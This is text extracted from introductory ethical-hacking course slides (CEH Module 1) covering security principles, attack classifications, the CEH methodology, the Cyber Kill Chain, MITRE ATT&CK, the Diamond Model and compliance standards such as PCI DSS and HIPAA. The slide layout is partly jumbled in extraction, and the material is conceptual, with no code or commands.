CEH Module 1

Introduction to Ethical
Hacking

Riaz Gul
 Elements of Information Security

Information security is a state of well being of information and

infrastructure in which the possibility of theft tempering and
disruption of information and services is low or tolerable.

Confidentiality Confidentiality is the assurance that the information is accessible only to

authorized.

Integrity Integrity is the trustworthiness of data or resources in the prevention of

improper and unauthorized changes.

Availability is the assurance that the systems responsible for delivering,

Availability sorting and processing information are accessible when required by
authorized users.
Authenticity refers to the characteristic of communication, documents or
Authenticity
any data that ensures the quality of being genuine or uncorrupted.

Non-repudiation is a way to guarantee that the sender of a message cannot

Non-Repudiation later deny having sent the message and that the recipient cannot deny having
received the message
 Attacks Motive Goals and Objectives

Attackers generally have motives (goals) and objectives behind their information
security attack. A motive originates out of the notion that target system stores or
processes something valuable, which leads to the threat of an attack on the
system.

Attacks = Motive(Goal) + Method+ Vulnerability

• Disrupting business continuity

• Stealing information and manipulating data
• Creating fear and chaos by disrupting critical infrastructure
• Causing financial loss to the target
• Propagating religious or political beliefs
• Achieving a state’s military objectives
• Damaging the reputation of the target
• Taking revenge
 Classification of Attacks

Passive Attacks

Passive Attacks do not tamper with the data and involve

intercepting and monitoring network traffic and data flow on the
target network. Examples include sniffing and eavesdropping
foot printing, network traffic analysis.

Active Attacks
Active attacks tamper with the data in transit or disrupt the
communication or services between the system to bypass or
break into secured systems. Dos, Main-in-the-Middle, session
hijacking malware attacks, modification of information firewalls
ids attacks profiling arbitrary code execution privilege escalation
backdoor access DNS and ARP poisoning Compromised key
attack directory traversal attacks SQL Injection XSS Attacks
cryptography attacks spoofing attacks
 Classification of Attacks

Close-in Attacks

Close-in attacks are performed when the attacker is in close

physical proximity with the target system or network in order to
gather, modify or disrupt access to information. Social
engineering, shoulder surfing and dumpster diving

Insider Attacks

Insider attacks involve using privileged access to violate rules or

intentionally cause a threat to the organization’s information or
information system.
 Information Warfare

The term information warfare or infoWar refers to the user of information

and communication technologies to gain competitive advantages over
and opponent.

Defensive Information Warfare

Refers to all strategies and actions designed to defend against

attacks on ICT assets. Prevention Deterrence alters detection
emergency preparedness response

Offensive Information Warfare

Refers to information warfare that involves attacks against

the ICT assets of an opponent. Web Server attacks malware
attacks MITM attacks System Hacking
 Hacking Methodologies & Frameworks

Learning the hacking methodologies and frameworks helps

ethical hackers understand the phases involved in hacking
attempts along with the tactics, techniques and procedures
used by real hackers. This knowledge further helps them in
strengthening the security infrastructure of their organization.

Certified Ethical Hacker Hacking Methodology

(CHM)

Cyber Kill Chain Methodology

MITRE Attack Framework

Diamond Model of Intrusion Analysis

 Hacking Methodologies & Frameworks

Certified Ethical Hacker Hacking Methodology (CHM)

EC-Council’s CEH hacking methodology

defines the step-by-step process to
perform ethical hacking. The CHM
follows the same process as that of an
attacker, and the only differences are in
its hacking goals and strategies.
 Hacking Methodologies & Frameworks

Certified Ethical Hacker Hacking Methodology (CHM)

Footprinting

Footprinting and reconnaissance constitute the preparatory phase,

in which an attacker gathers as much information as possible about
the target prior to launching an attack. In this phase, the attacker
creates a profile of the target organization and obtains information
such as its IP address range namespace and employees.

Scanning

Scanning is used to identify active hosts, open ports, and

unnecessary services enabled on particular hosts. In this phase, the
attacker uses the details gathered during reconnaissance to scan
the network for specific information. Scanning is a logical extension
of active reconnaissance; in fact, some experts do not differentiate
scanning from active reconnaissance.
 Hacking Methodologies & Frameworks

Certified Ethical Hacker Hacking Methodology (CHM)

Enumeration
Enumeration involves making active connections to a
target system or subjecting it to direct queries. It is a
method of intrusive probing through which attackers
gather information such as network user lists, routing
tables, security flaws, shared users, groups, applications
and banners.

Vulnerability Analysis

Vulnerability assessment is the examination of the

ability of a system or application including its current
security procedures and controls to withstand assault.
 Hacking Methodologies & Frameworks

Certified Ethical Hacker Hacking Methodology (CHM)

System Hacking

Attackers follow a certain methodology to hack a

system. They first obtain information during the
footprinting, scanning, enumeration, and vulnerability
analysis phases, which they then use to exploit the
target system.

Gaining Access

This is the phase in which actual hacking occurs. The

previous phases help attackers identify security
loopholes and vulnerabilities in the target organization
IT assets. Attackers use this information, along with
techniques such as password cracking and the
exploitation of vulnerabilities including buffer overflows,
to gain access to the target organizational system.
 Hacking Methodologies & Frameworks

Certified Ethical Hacker Hacking Methodology (CHM)

Privilege Escalation

After gaining access to a system using a low-privilege

user account, the attacker may attempt to increase their
privilege to the administrator level to perform protected
system operations so that they can proceed to the next
level of the system hacking phase.

Marinating Access
Maintaining access refers to the phase in which an
attacker attempts to retain ownership of the system.
Once an attacker gains access to the target system with
admin or root-level privileges they can use both the
system and its resources at will. The attacker can either
use the system as a launchpad to scan and exploit other
systems or maintain a low profile and continues
exploitation.
 Hacking Methodologies & Frameworks

Certified Ethical Hacker Hacking Methodology (CHM)

Clearing Logs

To remain undetected, it is important for attackers to

erase all the evidence of security compromise from
the system. To achieve this, they might modify or
delete logs in the system using certain log-wiping
utilities, thus removing all evidence of their presence.
 Hacking Methodologies & Frameworks

Cyber Kill Chain Methodology

The cyber kill chain methodology is a component of Cyber Kill Chain Methodology
intelligence-driven defense for the identification and
prevention of malicious intrusion activities
It provides greater insight into attack phases, which helps • Reconnaissance
security professionals to understand the adversary’s • Weaponization
tactics, techniques and procedures beforehand. • Delivery
• Exploitation
It’s a framework developed for securing cyberspace based • Installation
on the concept of military kill chains. This method aims to • Command & Control
actively enhance intrusion detection and response. The • Actions on Objectives
cyber kill chain is equipped with a seven-phase protection
mechanism to mitigate and reduce cyber threats.
 Hacking Methodologies & Frameworks

Cyber Kill Chain Methodology

Reconnaissance

An adversary performs reconnaissance to collect as much

information about the target as possible to probe for
weak points before actually attacking. They look for
information such as publicly available information on the
internet, network information, system information and
the organizational information of the target.

Weaponization

The adversary analyzes the data collected in the previous

stage to identify the vulnerabilities and techniques that can
exploit and gain unauthorized access to the targe
organization. Based on the vulnerabilities identified during
analysis, the adversary selects or creates a tailored
deliverable malicious payload using an exploit and a
backdoor to send it to the victim.
 Hacking Methodologies & Frameworks

Cyber Kill Chain Methodology

Delivery
The previous stage included creating a weapon. Its
payload is transmitted to the intended victims as an email
attachment, via a malicious link on websites, or through a
vulnerable web application or USB drive. Delivery is a key
stage that measures the effectiveness of the defense
strategies implemented by the target organization based
on whether the intrusion attempt of the adversary is
blocked or not.

Exploitation
After the weapon is transmitted to the intended victim,
exploitation triggers the adversary’s malicious code to
exploit a vulnerability in the operating system,
application, or server on ta target system. At this stage,
the organization may face threats such as authentication
and authorization attacks, arbitrary code execution,
physical security threats, and security misconfiguration.
 Hacking Methodologies & Frameworks

Cyber Kill Chain Methodology

Installation

The adversary downloads and installs more malicious

software on the target system to maintain access to
the target network for an extended period. They may
use the weapon to install a backdoor to gain remote
access. After the injection of the malicious code on
one target system, the adversary gains the capability
to spread the infection to other end systems in the
network.
Action Objectives

The adversary controls the victim’s system from a

remote location and finally accomplishes their intended
goals. The adversary gains access to confidential data,
disrupts the services or network, or destroys the
operational capability of the target by gaining access to
its network and compromising more systems.
 Hacking Methodologies & Frameworks

Cyber Kill Chain Methodology

Command and Control

The adversary creates a command-and-control channel, which

establishes two-way communication between the victims' system and
adversary-controlled server to communicate and pass data back and
forth. The adversaries implement techniques such as encryption to hide
the presence of such channels. Using this channel the adversary
performs remote exploitation on the target system or network.
 Hacking Methodologies & Frameworks

MITRE Attack Framework

The term Tactics, Techniques, and procedures TTPs refers to the patterns of activities and methods associated with
specific threat actors or groups of threat actors.
Tactics, Techniques and Procedures TTPs
Tactics Techniques Procedures

Tactics are the guidelines that

Techniques are the technical Procedures are organizational
describe the way an attacker
methods used by an attacker approaches that threat actors
performs the attack from
to achieve intermediate results follow to launch an attack.
beginning to the end.
during the attack. These The number of actions usually
These guideline consist of the
techniques include initial differs depending on the
various tactics for information
exploitation, setting up and objectives of the procedure
gathering to perform initial
maintain command and and threat actor group.
exploitation, privilege
control channels, accessing the
escalation, and lateral
target infrastructure, covering
movement, and to deploy
the tracks of data exfiltration,
measures for persistent
and others.
access to the system and
other processes.
 Hacking Methodologies & Frameworks

MITRE Attack Framework

Adversary Behavioral Identification

Adversary behavioral identification involves the identification of the common methods or techniques
followed by an adversary to launch attacks to penetrate an organization’s network. It gives security
professional insight into upcoming threats and exploits. Some of the behavior of an adversary that can
be used to enhance the detection capabilities of security services:

Use of Power Shell Internal Reconnaissance

PowerShell can be sued by an adversary as a Once the adversary is inside the target network, they
tool for automating data exfiltration and following various techniques and methods to carry
launching further attacks. To identify the misuse of internal reconnaissance. This include the
of PowerShell in the network, security enumeration of systems, hosts, processes, the
professionals can check PowerShell's transcript execution of various commands to find out
logs or windows event logs. The user agent information such as the local user context and
string and IP Address can also be used to system configuration, hostname IP addresses active
identify malicious hosts who try to exfiltrate remote systems etc.
data.
Use of Command Line Interface HTTP User Agent Command and Control server Use of DNS Tunneling
Use of Web Shell Data Stagging
 Hacking Methodologies & Frameworks

MITRE Attack Framework

Indicators of Compromise

Cyber threats are continuously evolving with the newer TTPs adapted based
on the vulnerabilities of the target organization. Security professionals must
perform continuous monitoring of IoCs to effectively and efficiently detect
and respond to evolving cyber threats. Indicators of compromise are the
clues, artifacts, and pieces of forensic data that are found on a network or
operating system of an organization that indicate a potential intrusion or
malicious activity in the organization’s infrastructure.

Indicators of Compromise (IoCs) Categories

• Email Indicators
• Network Indicators
• Host Based Indicators
• Behavioral Indicators
 Hacking Methodologies & Frameworks

MITRE Attack Framework

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques
based on real world observations. The ATT&CK knowledge base is used as a foundation for
the development of specific threat models and methodologies in the private sector,
government, and the cybersecurity product and service community. The following are the
tactics in ATT&CK for enterprise.

• Reconnaissance
• Resource Development
• Initial Access
• Execution
• Persistence
• Privilege Escalation
• Defense Evasion
• Credential Access
• Discovery
• Lateral Movement
• Collection
• Command and Control
• Exfiltration
• Impact
 Hacking Methodologies & Frameworks

Diamond Model of Intrusion Analysis

The diamond model offers a framework

for identifying the clusters of events that
are correlated on any of the system in an
organization
It can control vital atomic element
occurring in any intrusion activity, which is
referred to as the Diamond event

Using this model, efficient mitigation

approaches can be developed, and
analytic efficiency can be increase.
 Hacking Methodologies & Frameworks

Diamond Model of Intrusion Analysis

Adversary An opponent who was behind the attack

The target that has been exploited or

Victim
where the attack was performed

Capability
The attack strategies or how the attack
was performed

Infrastructure What the adversary used to reachOMP BEST PATH SELECTION

the victim
 HACKING CONCEPT

What is hacking !

Hacking refers to exploiting system vulnerabilities and compromising security

controls to gain unauthorized or inappropriate access to a system’s
resources.

It involves modifying system or application features to achieve a goal outside

of the creator’s original purpose.

Hacking can be used to steal and redistribute intellectual property, leading to

business loss.
 HACKING CONCEPT

What is hacking !

Hacking refers to exploiting system vulnerabilities and compromising security

controls to gain unauthorized or inappropriate access to a system’s
resources.

It involves modifying system or application features to achieve a goal outside

of the creator’s original purpose.

Hacking can be used to steal and redistribute intellectual property, leading to

business loss.

Who is Hacker
A hacker is a person who breaks into a system or network without
authorization to destroy, steal sensitive data, or perform malicious attacks. A
hacker is an intelligent individual with excellent computer skills, along with
the ability to create and explore the computer’s software and hardware
 HACKING CONCEPT

Hacker Classes
• Black Hats
• White Hats
• Gray Hats
• Suicide Hackers
• Script Kiddies
• Cyber Terrorists
• State Sponsored Hackers
• Hacktivist
• Hacker Teams
• Industrial Spies
• Insider
• Criminal Syndicates
• Organized Hackers
 Ethical HACKING

Ethical hacking involves the use of hacking tools, tricks, and techniques
to identify vulnerabilities and ensure system security.
It focuses on simulating the techniques used by attackers to verify the
existence of exploitable vulnerabilities in a system’s security

Ethical hackers perform security assessments for an organization with

the permission of concerned authorities.
 Ethical HACKING

Why Ethical Hacking is Necessary?

Ethical hacking is necessary as it allowed for

counter attacks against malicious hackers
through anticipating the methods used to break
into the system.

Reasons why organizational recruit ethical hackers

• To prevent hackers from gaining access to • To provide adequate preventive

the organization’s information system measures to avoid security breaches

• To uncover vulnerabilities in systems and • To help safeguard customer data

exploit their potential as a security risk
• To enhance security awareness at all
• To analyze and strengthen an levels in a business
organization’s security posture, including
policies, network protection infrastructure
and end user practices.
 Information security controls prevent the occurrence of
unwanted events and reduce risk to the organization’s
information assets. The basic security concepts critical to
information on the internet are confidentiality, integrity, and
availability; the concept related to the person accessing the
information and authentication, authorization and non-
repudiation.

Information Assurance (IA)

IA refers to the assurance that the integrity, availability

confidentiality and authenticity of information and
information systems is protected during the usage processing
storage and transmission of information.
 Continual/Adaptive security
Strategy

Organizations should
adapt adaptive security
strategy, which involves
implementation all the
four network security
approaches.
Defense in Depth
Laws are a system of rules and guidelines that are enforced by a particular
country or community to govern behavior. A standard is a document
established by consensus and approved by a recognized body that
provides, for common and repeated use, rules, guidelines, or
characteristics for activities or their results, aimed at the achievement of
the optimum degree of order in a given context.
 Payment Card Industry Data Security Standard (PCI DSS)

The payment card industry data security standard (PCI DSS) is a proprietary
information security standard for organizations that handle cardholder
information for major debit, credit prepared, e-purse, ATM and POS cards.

PCI DSS applies to all entities involved in payment card processing including
merchants, processors, acquires, issuers, and service providers, as well as
all other entities that store process or transmit cardholder data.

PCI Data Security Standard High-Level Overview

• Build and Maintain a Secure Network
• Protect Cardholder Data
• Maintain a Vulnerability Management Program
• Implement Strong Access Control Measures
• Regularly monitor and Test Networks
• Maintain an information security policy
Failure to meet the PCI DSS requirements may result in fines or the termination of payment card
processing privileges
 ISO/IEC 27001:2013

ISO/IEC 27001:2013 specifies the requirements for establishing,

implementing, maintaining, and continually improving an information
security management system within the context of the organization.
It is intended to be suitable for several different types of use including :

• Use within organizations to formulate security requirements and objectives

• Use within organizations to ensure that security risks are cost-effectively managed
• Use within organizations to ensure compliance within laws and regulations
• Definition of new information security management processes
• Identification and clarification of existing information security management processes
• Use by organization management to determine the status of information security management activities
• Implementation of business enabling information security
• Use by organizations to provide relevant information about information security to customers
 Health Insurance Portability and Accountability ACT (HIPPA)

Enforcement Rule
HIPPAs Administrative Simplification Statue and Rules
Provides the standards for enforcing all t
Electronic Transaction and Code of Set Standards administration simplification rules

Requires every provider who does business

electronically to use the same health care
transaction, code sets, and identifiers

Privacy Rule
Provides federal protections for the propenal
health information held by covered entities and
gives patients an array of rights with respect to
that information
Security Rule
Specifies a series of administrative, physical, and technical
safeguards for covered entities to use to ensure the confidentiality,
integrity, and availability of electronically protected health
information.
 Health Insurance Portability and Accountability ACT (HIPPA)

HIPPAs Administrative Simplification Statue and Rules

Security Rule
Specifies a series of administrative, physical, and
technical safeguards for covered entities to use to
ensure the confidentiality, integrity, and availability of
electronically protected health information.

National Identifier Requirements

Requires that health care providers, health plans, and
employers have standard national numbers that identify
them attached to standard transactions.

Enforcement Rule

Provides the standards for enforcing all the

administration simplification rules